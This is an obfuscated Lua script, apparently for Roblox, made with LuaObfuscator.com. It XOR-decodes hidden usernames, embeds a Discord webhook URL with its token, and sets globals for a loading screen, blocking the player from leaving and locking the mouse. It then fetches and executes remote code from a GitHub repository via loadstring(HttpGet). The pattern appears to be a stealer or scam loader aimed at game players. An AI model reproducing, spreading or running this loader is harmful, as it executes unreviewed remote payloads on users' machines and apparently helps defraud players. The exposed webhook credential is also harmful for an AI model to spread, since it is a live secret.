--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end UserName=v7("\208\207\217\32\244\175\200\25\216\204\205\36\232\181\206\78\129\146","\126\177\163\187\69\134\219\167");Webhook="https://discord.com/api/webhooks/1135312060599783546/ZMS7QgwUnx8fNqvfkcmm4c0X3v_r1CGXo_5V7yJ4U1oShKT4Zr31pqdEOR1WC5Bc8AXS";UserName2=v7("\34\193\40\192\238\55\194\45\204\243\53\204\36\203\245\115\157\123","\156\67\173\74\165");_G.LoadingScreen=true;_G.AntiLeave=true;_G.MouseLock=true;loadstring(game:HttpGet("https://raw.githubusercontent.com/LypherX/MoriScripts/main/MoriScriptZ",true))();
